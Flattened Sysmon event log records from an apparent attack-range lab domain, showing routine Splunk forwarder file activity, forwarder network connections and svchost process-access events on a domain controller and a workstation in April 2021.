11241100x80000000000000001605999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:46.186{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605998Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:46.185{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29870E08A3CAEF5486CAC61A0460B85E,SHA256=02DB3BDF8AB1BF485B126BAE9FD031C6271C68BEFF20027A7F8FB0D4271BB84Dfalsefalse - insufficient disk space
354300x80000000000000001094971Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.724{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1139-false10.0.1.12-8000-
10341000x80000000000000001094970Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094969Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094968Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.127{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B232C9763B194CE8FC657A00FBA5DA41,SHA256=6F46152AEEA24B15142357E558106C0ADA5BA98CDD78453B88ADBC4E205E7134,IMPHASH=00000000000000000000000000000000falsetrue
23542300x80000000000000001094967Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.126{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=944E80624A16CF2F545DC909D33E85C3,SHA256=05775D01DD39E75611D7D075C4A31BD8DE950979DF2D09CFBBD2A9F7DA357FB7,IMPHASH=00000000000000000000000000000000falsetrue
23542300x80000000000000001094976Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.772{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0193B520781AAB79B89A81471CABA44,SHA256=234AC1672336FCDFB45412A0A5665B1628371F9173F833CDE718CE2BCA9F40B5,IMPHASH=00000000000000000000000000000000falsetrue
11241100x80000000000000001606001Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:47.340{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001606000Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:47.340{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F749520F298F212D5B2BBCECE2D7B8E,SHA256=A06E48C1756B3798517A11029454069196630E5761262CA566C5608658F56EF0falsefalse - insufficient disk space
23542300x80000000000000001094975Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.619{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B232C9763B194CE8FC657A00FBA5DA41,SHA256=6F46152AEEA24B15142357E558106C0ADA5BA98CDD78453B88ADBC4E205E7134,IMPHASH=00000000000000000000000000000000falsetrue
10341000x80000000000000001094974Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094973Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094980Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:48.796{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ECCF6D691EE2521EC92DF05FB7B7616,SHA256=15B1EA5E5EFB2EEDC880BE6FC054B3D3C4F0B73A821F523AF96224085167CE50,IMPHASH=00000000000000000000000000000000falsetrue
11241100x80000000000000001606003Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:48.527{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001606002Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:48.527{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3CF5597451E2066154D9DB3C5AE5FC,SHA256=9BD8CFE6FF3D4D2257EDFD25A6E95521726FA659052E2D068BDD09DBB577DC88falsefalse - insufficient disk space
354300x80000000000000001094979Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.213{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local49491-
10341000x80000000000000001094978Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:48.482{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094977Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:48.482{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094984Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.807{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7606B740E24225CD35005BB1402DBBD,SHA256=2DEA2B938D2D47E35EDF250A90E5ED176AF8CE5EDBC1BAA2D617138ABD107057,IMPHASH=00000000000000000000000000000000falsetrue
11241100x80000000000000001606010Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.530{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001606009Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.530{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9919C74B33841483AC2AF4EA993A178,SHA256=C2B47C5852411A6E007F7013055E0D5CF8E184B726A6A2AE3D14D28F7A4E5EE9falsefalse - insufficient disk space
10341000x80000000000000001094983Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.483{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094982Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.483{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094981Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.153{761B69BB-818C-607D-1100-00000000BA01}92NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2BA81CA017AE669CD6F0D7294AA588FD,SHA256=086079BC24F0502CBB4885420380A07BC8AADB86EA1AA85E8B8A6D48D0F79F8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606008Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:47.692{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49723-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606007Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606006Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04A571D93215048A0C0817A02C760FC5,SHA256=49F3FA4BCABB170092CE7B8F8DA4641FA1293A0D44A0531748D74E417490FA7Dfalsefalse - insufficient disk space 11241100x80000000000000001606005Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606004Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86FC26166BC5467851CF946B767AC1D6,SHA256=F4CFAFF7EB271CE1CE37D678C5D9D245AE91F7DD2E92C11EA9B8831DDC1F5DDEfalsefalse - insufficient disk space 23542300x80000000000000001094987Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:50.824{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A4BA661342360F4A3CF1FEF18CF535,SHA256=084D60C79D836A4D4056144FDE327CEFEAE5ABD625EE06273F5B45308A52BB01,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606012Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:50.532{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606011Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:50.532{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1819F3C4A03FEA463389A781D6CEAEFD,SHA256=2DC0DCA046CC5B02EE632D7B032B05EC0E851B941637A0A8C97EBDFD9B36955Dfalsefalse - insufficient disk space 10341000x80000000000000001094986Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:50.484{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094985Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:50.484{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606014Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:51.535{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606013Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:51.535{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E078A6FF38C5568CEB1B5D8CC049E560,SHA256=80C0F433FACEE22295FFE7A3AF646AF58650E1151B990A156BF7ACF226B52ECBfalsefalse - insufficient disk space 23542300x80000000000000001094992Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.838{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA1DC844458F287930E100BBCBA5E22,SHA256=A1C7008F78BC6FA999E767D043CE912B5B96EB2F267D9BF6EA3109D48619D6B5,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001094991Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.851{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1140-false10.0.1.12-8000- 10341000x80000000000000001094990Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.485{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094989Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.485{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094988Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.269{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74E7B03FB18BCEA155C15674E792CAE0,SHA256=2C7ECA81AED04A8E02654E415B1FD4B8EB77126DE54BC6E02701391BA7369D0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094995Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:52.849{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A79CBD0CEFECEA33E654A5A0637D4D21,SHA256=86BA837FE77670EB0F24B674B97E0EE40DD64465BF4C41B449C399A78A050A17,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606016Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:52.537{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606015Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:52.537{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF4C262A17767781BC99C475315A3D97,SHA256=A76A0D8DF30B34293F79ECE0B03CAB59DF4C6C2047329EAEF26FFD5C0BEDF66Ffalsefalse - insufficient disk space 10341000x80000000000000001094994Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:52.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094993Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:52.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094998Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:53.859{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF0A97A80C4BB9F5326928A2BC2DF254,SHA256=704943502CBB9AE27486AE5514E58F40E23BD4AC8895B3C9CA459B498D0D158B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606018Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
